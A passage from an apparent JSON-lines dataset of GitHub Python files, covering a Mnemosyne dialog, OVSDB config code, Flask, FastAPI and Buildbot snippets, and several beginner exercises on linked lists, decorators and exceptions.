self.delete_native_card_type_button.setEnabled(True)\r\n self.edit_Anki_card_type_button.setEnabled(False)\r\n self.rename_Anki_card_type_button.setEnabled(False)\r\n self.delete_Anki_card_type_button.setEnabled(False)\r\n\r\n def activate_Anki_card_type(self):\r\n self.rename_native_card_type_button.setEnabled(False)\r\n self.delete_native_card_type_button.setEnabled(False)\r\n self.edit_Anki_card_type_button.setEnabled(True)\r\n self.rename_Anki_card_type_button.setEnabled(True)\r\n self.delete_Anki_card_type_button.setEnabled(True)\r\n\r\n def delete_native_card_type(self):\r\n self.delete_selected_card_type(\\\r\n self.native_card_types.selected_card_type())\r\n\r\n def delete_Anki_card_type(self):\r\n self.delete_selected_card_type(\\\r\n self.Anki_card_types.selected_card_type())\r\n\r\n def delete_selected_card_type(self, card_type):\r\n if not card_type:\r\n return\r\n answer = self.main_widget().show_question\\\r\n (_(\"Delete this card type?\"), _(\"&OK\"), _(\"&Cancel\"), \"\")\r\n if answer == 1: # Cancel.\r\n return\r\n self.controller().delete_card_type(card_type)\r\n self.update()\r\n\r\n def rename_native_card_type(self):\r\n self.rename_selected_card_type(\\\r\n self.native_card_types.selected_card_type())\r\n\r\n def rename_Anki_card_type(self):\r\n self.rename_selected_card_type(\\\r\n self.Anki_card_types.selected_card_type())\r\n\r\n def rename_selected_card_type(self, card_type):\r\n if not card_type:\r\n return\r\n\r\n from mnemosyne.pyqt_ui.ui_rename_card_type_dlg \\\r\n import Ui_RenameCardTypeDlg\r\n\r\n class RenameDlg(QtWidgets.QDialog, Ui_RenameCardTypeDlg):\r\n def __init__(self, old_card_type_name):\r\n super().__init__()\r\n self.setupUi(self)\r\n self.card_type_name.setText(old_card_type_name)\r\n\r\n dlg = RenameDlg(card_type.name)\r\n if dlg.exec() == QtWidgets.QDialog.DialogCode.Accepted:\r\n new_name = dlg.card_type_name.text()\r\n self.controller().rename_card_type(card_type, new_name)\r\n self.update()\r\n\r\n def edit_Anki_card_type(self):\r\n card_type = self.Anki_card_types.selected_card_type()\r\n if not card_type:\r\n return\r\n dlg = EditMSidedCardTypeDlg(card_type,\r\n component_manager=self.component_manager)\r\n if dlg.exec() == QtWidgets.QDialog.DialogCode.Accepted:\r\n self.database().update_card_type(card_type)\r\n self.update()\r\n\r\n def _store_state(self):\r\n self.config()[\"manage_card_types_dlg_state\"] = self.saveGeometry()\r\n\r\n def closeEvent(self, event):\r\n # Generated when clicking the window's close button.\r\n self._store_state()\r\n\r\n def accept(self):\r\n self._store_state()\r\n return QtWidgets.QDialog.accept(self)\r\n\r\n def reject(self):\r\n self._store_state()\r\n return QtWidgets.QDialog.reject(self)\r\n\r\n","repo_name":"mnemosyne-proj/mnemosyne","sub_path":"mnemosyne/pyqt_ui/manage_card_types_dlg.py","file_name":"manage_card_types_dlg.py","file_ext":"py","file_size_in_byte":7084,"program_lang":"python","lang":"en","doc_type":"code","stars":443,"dataset":"github-code","pt":"21"} +{"seq_id":"5162406294","text":"#python debugger module\nimport pdb\nfirst = \"F\"\nsecond = \"S\"\npdb.set_trace()\nresult = first + second\nthird = \"T\"\nresult += third\nprint(result)\n\n# put: pdb.set_trace()\n#into line of code that is giving you an error and see which line is giving you the problem\n\n#Common PDB command:\n# l (list)\n# n (next line)\n# p (print)\n# c (continue - finished debugging and runs throug the rest of the code)\n","repo_name":"ksompura/python_training","sub_path":"debugging_and_error_handling/pdb_PythonDebuging.py","file_name":"pdb_PythonDebuging.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24945973633","text":"\ndef guessing_game()-> None:\n from random import randint\n my_guessing_value = randint(0,100)\n user_guessed = -10\n\n while user_guessed != my_guessing_value:\n user_guess_str = input((\"Guess a number between 0 and 100 -> \"))\n assert user_guess_str.isdigit() == True\n user_guessed = int(user_guess_str)\n message_str = f\"Your guess of {user_guessed} is too \"\n if user_guessed > my_guessing_value:\n print(message_str+\"high!\")\n else:\n print(message_str+\"low!\")\n\n \n print(f\"Congratulation you guessed correct!\")\n\nguessing_game()\n\n \n\n\n\n\n","repo_name":"Must-ah/Python-Exercises","sub_path":"1_Numerical_types/Exercise_1/Exercise_1_Number_guessing_game.py","file_name":"Exercise_1_Number_guessing_game.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43802585891","text":"import _read, _write\nimport ops.constants, ops.opsidl\n\nfrom ovs.db.idl import SchemaHelper, Idl, Transaction\n\nimport ovs.vlog\nvlog = ovs.vlog.Vlog('dc')\n\n\ndef register(extschema, ovsschema, ovsremote):\n \"\"\"Register interest in all configuration and index\n columns for all tables in ovsschema.\n\n Args:\n extschema (opslib.RestSchema): This is the\n parsed extended-schema (vswitch.extschema) object.\n ovsschema: OVSDB schema file\n ovsremote: OVSDB remote socket\n\n Returns:\n ovs.db.idl.Idl instance\n \"\"\"\n\n schema_helper = SchemaHelper(ovsschema)\n\n for tablename, tableschema in extschema.ovs_tables.iteritems():\n\n register_columns = []\n\n # configuration columns\n config_columns = [str(key) for key in tableschema.config.keys()]\n # reference columns\n reference_columns = [str(key) for key in tableschema.references.keys()]\n\n # index columns\n for item in tableschema.index_columns:\n if not item in config_columns:\n register_columns.append(str(item))\n\n register_columns += config_columns\n register_columns += reference_columns\n\n # dynamic columns\n if tableschema.dynamic:\n for key in tableschema.dynamic.keys():\n if key not in register_columns:\n register_columns.append(key)\n\n # NOTE: remove this when we have a proper\n # solution for TG-1116\n if str(tablename) == 'VLAN':\n register_columns.append('internal_usage')\n\n schema_helper.register_columns(str(tablename), register_columns)\n\n idl = ops.opsidl.OpsIdl(ovsremote, schema_helper)\n return idl\n\n\ndef read(extschema, idl):\n \"\"\"Read the OpenSwitch OVSDB database\n\n Args:\n extschema (opslib.RestSchema): This is the\n parsed extended-schema (vswitch.extschema) object.\n idl (ovs.db.idl.Idl): This is the IDL object that\n represents the OVSDB IDL.\n\n Returns:\n dict: Returns a Python dictionary object containing\n data read from all OVSDB tables and arranged according\n to the relationship between various tables as\n described in vswitch.extschema\n \"\"\"\n config = {}\n for table_name in extschema.ovs_tables.keys():\n\n # Check only root table or top level table\n if extschema.ovs_tables[table_name].parent is not None:\n continue\n\n # Get table data for root or top level table\n try:\n table_data = _read.get_table_data(table_name, extschema, idl)\n except Exception as e:\n vlog.err(e)\n return e\n\n if table_data is not None:\n config.update(table_data)\n\n # remove system uuid\n config[ops.constants.OVSDB_SCHEMA_SYSTEM_TABLE] = config[ops.constants.OVSDB_SCHEMA_SYSTEM_TABLE].values()[0]\n vlog.dbg('succcess generating running configuration')\n return config\n\ndef write(data, extschema, idl, txn=None, block=False):\n \"\"\"Write a new configuration to OpenSwitch OVSDB database\n\n Args:\n data (dict): The new configuration represented as a Python\n dictionary object.\n extschema (opslib.RestSchema): This is the\n parsed extended-schema (vswitch.extschema) object.\n idl (ovs.db.idl.Idl): This is the IDL object that\n represents the OVSDB IDL.\n txn (ovs.db.idl.Transaction): OVSDB transaction object.\n block (boolean): if block is True, commit_block() is used\n\n Returns:\n result : The result of transaction commit\n \"\"\"\n if txn is None:\n try:\n txn = Transaction(idl)\n block = True\n except AssertionError as e:\n vlog.dbg('error in creating transaction: %s' % e)\n return e\n\n # dc.read returns config db with 'System' table\n # indexed to 'System' keyword. Replace it with\n # current database's System row UUID so that all\n # tables in 'data' are represented the same way\n\n try:\n system_uuid = idl.tables[ops.constants.OVSDB_SCHEMA_SYSTEM_TABLE].rows.keys()[0]\n data[ops.constants.OVSDB_SCHEMA_SYSTEM_TABLE] = {system_uuid:data[ops.constants.OVSDB_SCHEMA_SYSTEM_TABLE]}\n\n _write.setup_validators(extschema, idl)\n\n # iterate over all top-level tables i.e. root\n for table_name, tableschema in extschema.ovs_tables.iteritems():\n\n # iterate over non-children tables\n if extschema.ovs_tables[table_name].parent is not None:\n continue\n\n # set up the non-child table\n _write.setup_table(table_name, data, extschema, idl, txn)\n\n # iterate over all tables to fill in references\n for table_name, tableschema in extschema.ovs_tables.iteritems():\n\n if extschema.ovs_tables[table_name].parent is not None:\n continue\n\n _write.setup_references(table_name, data, extschema, idl)\n\n validation_errors = _write.exec_validators()\n if validation_errors:\n return (txn.ERROR, validation_errors)\n\n except Exception as e:\n txn.abort()\n return (txn.ERROR, e)\n\n try:\n if not block:\n # txn maybe be incomplete\n result = txn.commit()\n else:\n # txn will block until it is completed\n result = txn.commit_block()\n vlog.dbg('transacton result: %s' % result)\n return (result, txn.get_error())\n\n except Exception as e:\n vlog.err('transaction exception: %s' % e)\n txn.abort()\n return (txn.ERROR, e)\n","repo_name":"libreswitch/restd","sub_path":"ops/dc.py","file_name":"dc.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14994393959","text":"def make_squares2(arr):\n '''\n Given a sorted array, create a new array containing\n squares of all the number of the input array in the sorted order.\n '''\n\n squares = []\n\n for el in arr:\n squares.append(abs(el * el))\n\n squares.sort()\n\n return squares\n\ndef make_squares3(arr):\n '''\n Given a sorted array, create a new array containing\n squares of all the number of the input array in the sorted order.\n '''\n\n left, right = 0, 0\n squares = []\n\n while arr[left] < 0:\n left += 1\n\n if arr[left + 1] != None:\n right = left + 1\n elif arr[left - 1] != None:\n right = left\n left -= 1\n\n while left >= 0 or right < len(arr):\n if left >= 0 and right < len(arr):\n left_sqr = arr[left] * arr[left]\n right_sqr = abs(arr[right] * arr[right])\n\n if left_sqr == right_sqr:\n squares.append(left_sqr)\n squares.append(right_sqr)\n left -= 1\n right += 1\n elif left_sqr < right_sqr:\n squares.append(left_sqr)\n left -= 1\n else:\n squares.append(right_sqr)\n right += 1\n elif left >= 0:\n squares.append(arr[left] * arr[left])\n left -= 1\n else:\n squares.append(abs(arr[right] * arr[right]))\n right += 1\n\n return squares\n\ndef make_squares(arr):\n '''\n Given a sorted array, create a new array containing\n squares of all the number of the input array in the sorted order.\n '''\n\n squares = [0 for x in range(len(arr))]\n pointer = len(arr) - 1\n left, right = 0, pointer\n\n while left <= right:\n left_square = arr[left] * arr[left]\n right_square = arr[right] * arr[right]\n\n if left_square > right_square:\n squares[pointer] = left_square\n left += 1\n else:\n squares[pointer] = right_square\n right -= 1\n\n pointer -= 1\n\n return squares\n\n# |\narray = [-2, -1, 0, 2, 3]\n# |\n\nprint(make_squares(array))","repo_name":"luckydimdim/grokking","sub_path":"two_pointers/squaring_a_sorted_array/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"36900852721","text":"# 数组查找\r\nclass Solution:\r\n\t'''input:[1,2,3,4,5],target=9,out:[3,4]'''\r\n\tdef slist(self,nums,target):\r\n\t\thashmap = {}\r\n\t\tfor index,num in enumerate(nums):\r\n\t\t\tanother_num = target-num\r\n\t\t\tif another_num in hashmap:\r\n\t\t\t\treturn [hashmap[another_num],index]\r\n\t\t\thashmap[num] = index\r\ns = Solution()\r\nr=s.slist([1,2,3,4,5],9)\r\nprint(r)\r\n\r\n# 单例模式\r\nclass Singe:\r\n\tdef __new__(cls,*args,**kwargs):\r\n\t\tif not hasattr(cls, '_instance'):\r\n\t\t\t_instance = super().__new__(cls,*args,**kwargs)\r\n\t\t\tcls._instance = _instance\r\n\t\treturn cls._instance\r\n\r\na = Singe()\r\nb = Singe()\r\nprint(a is b)\r\n\r\n# 装饰器\r\nfrom functools import wraps\r\nimport time\r\ndef timelog(_int=False):\r\n\tdef log(func):\r\n\t\t@wraps(func)\r\n\t\tdef _log(*args,**kwargs):\r\n\t\t\tbeg = time.time()\r\n\t\t\tres = func(*args,**kwargs)\r\n\t\t\tif _int:\r\n\t\t\t\tprint('耗时:%s s'%(int(time.time()-beg)))\r\n\t\t\telse:\r\n\t\t\t\tprint('耗时:%s s'%(time.time()-beg))\r\n\t\t\treturn res\r\n\t\treturn _log\r\n\treturn log\r\n@timelog(True)\r\ndef mytime():\r\n\ttime.sleep(1)\r\nmytime()\r\n\r\nclass TimeLog:\r\n\tdef __init__(self,_int=False):\r\n\t\tself._int = _int\r\n\tdef __call__(self,func):\r\n\t\t@wraps(func)\r\n\t\tdef _log(*args,**kwargs):\r\n\t\t\tbeg = time.time()\r\n\t\t\tres = func(*args,**kwargs)\r\n\t\t\tif self._int:\r\n\t\t\t\tprint('耗时:%s s'%(int(time.time()-beg)))\r\n\t\t\telse:\r\n\t\t\t\tprint('耗时:%s s'%(time.time()-beg))\r\n\t\t\treturn res\r\n\t\treturn _log\r\n\r\n@TimeLog(True)\r\ndef mtime():\r\n\ttime.sleep(1)\r\nmtime()\r\n\r\n","repo_name":"heping945/separatepyfile","sub_path":"filefolder/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14390674477","text":"#---------- Easy A ----------#\n\nnumber = int(input(\"Число: \")) \n\nif number < 0: # Если число отрицательное\n raise ValueError(\"Ошибка ввода!\") # Вызываем исключение\nelse:\n print(\"it's ok\") # Иначе все нормально \n\n\n\n\n\n#---------- Easy B ----------#\n\ntry: \n number = int(input(\"Число: \")) # Попытка принять с консоли целое число\nexcept:\n print(\"srsly?\") # Если появиться исключение, выводим нужный ответ\nelse:\n print(number) # А если же всё нормально, то выводим число обратно\n\n\n\n\n\n#---------- Easy C ----------#\n\nname = input(\"Имя: \")\n\nif name[0].isupper(): # Если нулевой элемент строки это буква верхнего регистра\n print(\"welcome\") # То это то что нам нужно\nelse:\n raise NameError(\"чел ты...\") # Иначе вызываем исключение\n\n\n\n\n\n#---------- Medium A ----------#\n\nname = input(\"Имя: \")\n\nfor symbol in name: # Итерируем имя(строка)\n if not symbol.isalpha(): # Если какой то символ НЕ будет являться буквой\n raise NameError(\"чел ты...\") # Вызываем исключение\n \nprint(\"welcome\") # Если до этого момента программа не завершилась исключением, то выводим нужный ответ\n\n\n\n\n\n#---------- Medium B ----------#\n\nemail = input(\"email: \")\n\nif email.count(\"@\") == 1: # Если количество символа \"собачка\" равна к 1\n print(\"ok\") # Это нормально\nelse:\n raise Exception(\"чел ты...\") # Если не так, вызываем исключение\n\n\n\n\n\n#---------- Medium C ----------#\n\nemail = input(\"email: \") \nat_index = email.find(\"@\") # Находим индекс символа \"собачки\"\n\nfor symbol in email[:at_index]: # Итерируем срезанную строку до символа \"@\"\n if not symbol.islower(): # Если какой то итерируемый символ будет НЕ буквой нижнего регистра\n raise Exception(\"чел ты...\") # Вызываем исключение\n \nprint(\"ok\") # Если до этого момента программа не завершилась исключением, то выводим нужный ответ ","repo_name":"tebirenn/python_problems","sub_path":"lesson_17/cw17.py","file_name":"cw17.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40991527730","text":"from flask import Flask, request\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n return \"Sent\"\n\n@app.route('/data', methods=['POST'])\ndef ml():\n import json\n if request.method == 'POST':\n data = request.get_data()\n json_ob = json.loads(data)\n\n from apyori import apriori\n from apyori import load_transactions\n\n orders = json_ob[\"orders\"]\n\n class Recommender():\n def __init__(self, inputFile):\n self.AssociationRulesDictionary = {} # holds final output\n self.dataFile = inputFile # input datafile in csv form\n self.association_rules = [] # holds output from Apriori algo\n\n def computeRules(self):\n \"\"\"\n Copmputes all association rules.\n :return:\n \"\"\"\n with open(self.dataFile) as fileObj:\n transactions = list(load_transactions(fileObj, delimiter=\",\"))\n\n # remove empty strings if any\n transactions_filtered = []\n a = set()\n\n for li in transactions:\n li = list(filter(None, li))\n transactions_filtered.append(li)\n a |= set(li)\n\n self.association_rules = apriori(transactions_filtered, min_support=0.01, min_confidence=0.01,\n min_lift=1.0,\n max_length=None)\n\n def extractRules(self):\n\n for item in self.association_rules:\n\n if len(item[0]) < 2:\n continue\n\n for k in item[2]:\n\n baseItemList = list(k[0])\n # if base item set is empty then go to the next record.\n if not baseItemList:\n continue\n\n # sort the baseItemList before adding it as a key to the AssociationRules dictionary\n baseItemList.sort()\n baseItemList_key = tuple(baseItemList)\n\n if baseItemList_key not in self.AssociationRulesDictionary.keys():\n self.AssociationRulesDictionary[baseItemList_key] = []\n\n self.AssociationRulesDictionary[baseItemList_key].append((list(k[1]), k[3]))\n\n # sort the rules in descending order of lift values.\n for ruleList in self.AssociationRulesDictionary:\n self.AssociationRulesDictionary[ruleList].sort(key=lambda x: x[1], reverse=True)\n\n def recommend(self, itemList, Num=1):\n \"\"\"\n itemList is a list of items selected by user\n Num is total recommendations required.\n :param item:\n :return:\n \"\"\"\n\n # convert itemList to itemTuple as our dictionary key is a sorted tuple\n itemList.sort()\n itemTuple = tuple(itemList)\n\n if itemTuple not in self.AssociationRulesDictionary.keys():\n return []\n\n return self.AssociationRulesDictionary[itemTuple][:Num]\n\n def studyRules(self):\n \"\"\"\n This is a template method for computation and rule extraction.\n :return:\n \"\"\"\n self.computeRules()\n self.extractRules()\n\n Biobuy = Recommender(\"my_new_csv.csv\")\n Biobuy.studyRules()\n\n return str(Biobuy.recommend(orders, 3))\n\n\n\n","repo_name":"unitSphere/flask","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39042727562","text":"from buildbot.changes.base import PollingChangeSource\nfrom buildbot.process.logobserver import LineConsumerLogObserver\nfrom buildbot.util import json\nfrom buildbot.util import ascii2unicode\nfrom buildbot.util.state import StateMixin\nfrom buildbot.steps.shell import ShellCommand\nfrom twisted.internet import defer\nfrom twisted.internet import utils\nfrom twisted.python import log\n\nimport re\nimport os\n\n\nclass BuildStep(ShellCommand):\n new_build_re = re.compile(r'Need rebuild of ([\\w\\.]+)/\\.')\n finished_build_re = re.compile(r'Subtask commit build of gnome-continuous/components/([\\w\\.]+)/x86_64/\\.')\n currentComponent = ''\n\n def __init__(self, **kwargs):\n ShellCommand.__init__(self, **kwargs)\n self.addLogObserver('stdio', LineConsumerLogObserver(self.logConsumer))\n\n def getCurrentSummary(self):\n if self.currentComponent:\n return {u'step': u\"Building %s\" % self.currentComponent}\n else:\n return {u'step': u\"Starting\"}\n\n def getResultSummary(self):\n return {u'step': u\"Done\"}\n\n def logConsumer(self):\n while True:\n stream, line = yield\n m = self.new_build_re.match(line.strip())\n if m is not None:\n self.currentComponent = m.group(0)\n self.updateSummary()\n m = self.new_build_re.match(line.strip())\n if m is not None:\n component = m.group(0)\n log_contents = ''\n with open(\"local/build/log-%s.txt\" % component, 'r') as f:\n log_contents = f.read()\n self.addCompleteLog('log-%s' % component, log_contents)\n\n\nclass BGOPoller(PollingChangeSource, StateMixin):\n def __init__(self, workdir=None, pollInterval=5 * 60, pollAtLaunch=True,\n name='BGOPoller'):\n PollingChangeSource.__init__(self, name=name,\n pollInterval=pollInterval,\n pollAtLaunch=pollAtLaunch)\n self.lastRev = {}\n self.workdir = workdir\n\n def activate(self):\n # make our workdir absolute, relative to the master's basedir\n if not os.path.isabs(self.workdir):\n self.workdir = os.path.join(self.master.basedir, self.workdir)\n\n log.msg(\"BGOPoller: using workdir '%s'\" % self.workdir)\n d = self.getState('lastRev', {})\n\n def setLastRev(lastRev):\n self.lastRev = lastRev\n d.addCallback(setLastRev)\n d.addCallback(lambda _: PollingChangeSource.activate(self))\n d.addErrback(log.err, 'while initializing BGOPoller')\n\n def _dovccmd(self, command, path=None):\n d = utils.getProcessOutputAndValue('ostbuild', ['make', '-n'] + command,\n path=path, env=os.environ)\n\n def _convert_nonzero_to_failure(res):\n \"utility to handle the result of getProcessOutputAndValue\"\n (stdout, stderr, code) = res\n if code != 0:\n raise EnvironmentError('command failed with exit code %d: %s'\n % (code, stderr))\n return stdout.strip()\n d.addCallback(_convert_nonzero_to_failure)\n return d\n\n @defer.inlineCallbacks\n def poll(self):\n log.msg('BGOPoller: running resolve & bdiff')\n yield self._dovccmd(['resolve', 'fetchAll=true'], self.workdir)\n yield self._dovccmd(['bdiff'], self.workdir)\n log.msg('BGOPoller: resolve & bdiff complete')\n bdiff = json.load('local/bdiff.json')\n log.msg('BGOPoller: got bdiff: %s' % bdiff)\n rev = {}\n for change_type in ['added', 'modified', 'removed']:\n if 'gitlog' in bdiff[change_type].keys():\n project = bdiff[change_type]['latest']['name']\n src = bdiff[change_type]['latest']['src']\n gitlog = bdiff[change_type]['gitlog']\n for change in gitlog:\n rev = change\n yield self._process_changes(change, project, src)\n self.lastRev = rev\n yield self.setState('lastRev', self.lastRev)\n\n @defer.inlineCallbacks\n def _process_changes(self, newRev, project, src):\n revision = newRev['Checksum']\n author = newRev['From']\n timestamp = newRev['Date']\n\n yield self.master.data.updates.addChange(\n author=author,\n revision=revision,\n files=[],\n comments=[],\n when_timestamp=timestamp,\n branch=project,\n category=self.category,\n project=self.project,\n repository=ascii2unicode(src),\n src=u'git')\n","repo_name":"vrutkovs/buildbot-bgo","sub_path":"custom_steps.py","file_name":"custom_steps.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26625806097","text":"from typing import List\nfrom fastapi import APIRouter,status,Depends,HTTPException,Response\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.future import select\nfrom models.game_model import GameModel\nfrom models.user_model import UserModel\nfrom schemas.game_schemas import GameSchema\nfrom core.deps import get_current_user,get_session\nfrom fastapi_limiter.depends import RateLimiter\n\nrouter = APIRouter()\n\n@router.get('/',status_code=status.HTTP_200_OK,response_model=List[GameSchema])\nasync def get_games(db:AsyncSession = Depends(get_session)):\n async with db as session:\n query = select(GameModel)\n result = await session.execute(query)\n games:List[GameModel] = result.scalars().unique().all()\n\n return games\n\n\n@router.get('/{game_id}',status_code=status.HTTP_200_OK,response_model=GameSchema)\nasync def get_game(game_id:int,db:AsyncSession = Depends(get_session)):\n async with db as session:\n query = select(GameModel).filter(GameModel.id == game_id)\n result = await session.execute(query)\n game:GameModel = result.scalars().unique().one_or_none()\n\n if game:\n return game\n else :\n raise HTTPException(detail=\"Game não encontrado\",status_code=status.HTTP_404_NOT_FOUND)\n\n@router.post('/',status_code=status.HTTP_201_CREATED,response_model=GameSchema)\nasync def post_game(game:GameSchema,user_logged:UserModel = Depends(get_current_user),db:AsyncSession = Depends(get_session)):\n new_game = GameModel(nome=game.nome,ano_lancamento=game.ano_lancamento,nota=game.nota,lista_desejo=game.lista_desejo,genero=game.genero,classificacao_indicativa=game.classificacao_indicativa,criador_id=user_logged.id)\n\n db.add(new_game)\n await db.commit()\n\n return new_game\n\n@router.put('/{game_id}',status_code=status.HTTP_202_ACCEPTED,response_model=GameSchema)\nasync def put_game(game_id:int,game:GameSchema,db:AsyncSession=Depends(get_session),user_logged:UserModel=Depends(get_current_user)):\n async with db as session:\n query = select(GameModel).filter(GameModel.id == game_id).filter(UserModel.id == user_logged.id)\n result = await session.execute(query)\n game_updated:GameModel = result.scalars().unique().one_or_none()\n\n if game_updated:\n game_updated = game\n await session.commit()\n\n return game_updated\n \n else:\n HTTPException(status_code=status.HTTP_404_NOT_FOUND,detail='Game não encontrado')\n\n@router.delete('/{game_id}',status_code=status.HTTP_204_NO_CONTENT)\nasync def delete_game(game_id:int,db:AsyncSession = Depends(get_session),user_logged:UserModel=Depends(get_current_user)):\n async with db as session:\n query = select(GameModel).filter(GameModel.id == game_id).filter(UserModel.id == user_logged.id)\n result = await session.execute(query) \n game_deleted:GameModel = result.scalars().unique().one_or_none()\n\n if game_deleted:\n await session.delete(game_deleted)\n await session.commit()\n return Response(status_code=status.HTTP_204_NO_CONTENT)\n \n else:\n raise HTTPException(detail=\"Game não encontrado\",status_code=status.HTTP_404_NOT_FOUND)\n \n\n","repo_name":"guilherme-da-silva-maciel/fast-api-game_api","sub_path":"project/api/routes/endpoints/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9194398873","text":"class Node:\n '''\n Create a Node class that has properties for the value stored in the Node, and a pointer to the next Node.\n '''\n def __init__(self,value,next=None):\n self.value=value\n self.next=next\n\nclass LinkedList():\n def __init__(self):\n self.head=None\n\n def kt_from_end(self,k):\n if k>=0:\n if self.head==None:\n return 'empty linked list'\n else:\n i=0\n current=self.head\n while current:\n current=current.next\n i+=1\n if i-1 { b } -> { c } -> NULL\"\n '''\n\n if self.head==None:\n return('Empty linked List')\n i=self.head\n strll=''\n while i:\n if i!=None:\n strll += str( { i.value } ) + ' -> ' \n \n i=i.next\n if i==None:\n strll+='NULL'\n return (strll)\n\n def includes_node(self,inc_val):\n '''\n this method takes any value as an argument and returns a boolean result depending on whether that value exists as a Node’s value somewhere within the list.\n '''\n current=self.head\n while current!= None:\n if current.value==inc_val:\n return True\n else:\n current=current.next\n return False\n\n def insert_before(self,indx,val):\n node3=Node(val)\n if not self.includes_node(indx):\n return 'value not found '\n elif self.head.value==indx:\n self.insert_node(val)\n else:\n i=self.head\n while i.next!=None:\n if i.next.value==indx:\n node3.next=i.next\n i.next=node3\n break\n i=i.next\n \n def insert_after(self,indx,val):\n print('index',indx)\n node3=Node(val)\n if not self.includes_node(indx):\n return 'value not found '\n else:\n i=self.head\n while i.next!=None:\n if i.value==indx:\n node3.next=i.next\n i.next=node3\n break\n i=i.next\n i.next=node3\n\n def append(self,data):\n #st1 : init current with head (i=0)\n node=Node(data) \n if self.head==None:\n self.head=node\n # create data node \n #st2 --> keep moving until reach ast node l\n else:\n current=self.head\n while(current.next!=None):\n current=current.next \n #current is last node\n # make curret point to new nodes \n current.next=node\n \n # def isPalind(self):\n # cur=self.head\n # op=[]\n # while cur:\n # op.append(cur.value)\n # cur=cur.next\n \n # # print(len(op))\n # n=len(op)\n # print(op)\n # print(op[-2])\n\n # for i in range(len(op)):\n # print('iiiiii',i,op[i],-i-1,op[-i-1])\n # if op[i]==op[i-i] and i != n and i-1 !=n and len(op)!=1:\n # # if op[i] and op[len(op)-1] ==n:\n # v=op.pop(i)\n # v2=op.pop()\n # print('oooooooooooopppppppp',op)\n \n # print('v,v2',v,v2)\n \n # if len(op)==1:\n # return True\n # return False\n def palind(self):\n list2 = []\n current =self.head\n while current:\n list2.append(current.value)\n current= current.next\n print('list',list2)\n print(' reversed list ',list2[::-1])\n\n for ele in list2[::-1]:\n current=self.head\n if ele==current.value:\n return True\n return False\n \n\n def reversed(self):\n list=[]\n reverse=[]\n cur=self.head\n while cur:\n list.append(cur.value)\n cur=cur.next\n # print(list)\n for i in range(len(list)):\n reverse.append(list[-i-1])\n # reverse.append(list.pop())\n return reverse\n\n \n\n # pal=True\n # while current:\n # value=list2.pop()\n # print(pal)\n # if current.value==value:\n # pal=True\n # else:\n # pal= False\n # current=current.next\n # return pal\n\n # isPalind =True\n # while current:\n # value= list2.pop()\n # if current.value == value :\n # isPalind = True\n # else:\n # isPalind=False\n # current = current.next\n # return isPalind\n\nif __name__ == \"__main__\":\n ll=LinkedList()\n ll.insert_node(5)\n ll.insert_node(10)\n ll.insert_node(15)\n ll.insert_node(20)\n ll.insert_node(25)\n # {25} -> {20} -> {15} -> {10} -> {5} -> NULL\n print(ll.insert_after(10,0))\n print(ll.insert_before(5,-1))\n print(ll.insert_after(5,-20))\n l2=LinkedList()\n l2.insert_node(5)\n l2.insert_node(10)\n l2.insert_node(15)\n l2.insert_node(10)\n l2.insert_node(5)\n print(ll.palind())\n print(l2.palind())\n print(ll)\n print(ll.reversed())\n # print(ll.kt_from_end(2))","repo_name":"hadeelhhawajreh/data-structures-and-algorithms-c401","sub_path":"data_structures_and_algorithms/data_structures/linked_list/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":6088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2775009867","text":"import dataclasses\nfrom io import BytesIO\n\nfrom PySide6 import QtGui, QtCore\nfrom PySide6.QtCore import Signal, QRunnable, QThreadPool, QObject, Qt\nfrom PySide6.QtWidgets import (\n QTreeWidgetItem,\n QTreeWidget,\n QLayout,\n)\n\nfrom starhopper.formats.esm.file import Group, ESMContainer, Record, RecordFlag\nfrom starhopper.gui.common import (\n tr,\n ColorGray,\n ColorPurple,\n monospace,\n ColorRed,\n ColorOrange,\n)\nfrom starhopper.gui.viewers.record_viewer import RecordViewer\nfrom starhopper.gui.viewers.viewer import Viewer\nfrom starhopper.io import BinaryReader\n\n\nclass RecordChild(QTreeWidgetItem):\n def __init__(self, record: Record):\n super().__init__()\n self.record = record\n\n\nclass GroupChild(QTreeWidgetItem):\n def __init__(self, group: Group):\n super().__init__()\n self.group = group\n\n\nclass GroupLoaderSignals(QObject):\n progressStart = Signal(int)\n progressDone = Signal()\n\n\nclass GroupLoaderThread(QRunnable):\n \"\"\"\n Loads a group in the background and populates the details view.\n \"\"\"\n\n def __init__(self, viewer: \"GroupViewer\", group: Group):\n super().__init__()\n self.viewer = viewer\n self.group = group\n self.s = GroupLoaderSignals()\n\n def run(self):\n self.s.progressStart.emit(self.group.loc.size)\n\n item = QTreeWidgetItem(self.viewer.details)\n item.setText(0, tr(\"GroupViewer\", \"Details\", None))\n item.addChildren(\n [\n QTreeWidgetItem([\"Type\", self.group.type.decode(\"ascii\")]),\n QTreeWidgetItem([\"Size\", f\"{self.group.size} bytes\"]),\n QTreeWidgetItem([\"Label\", repr(self.group.label)]),\n 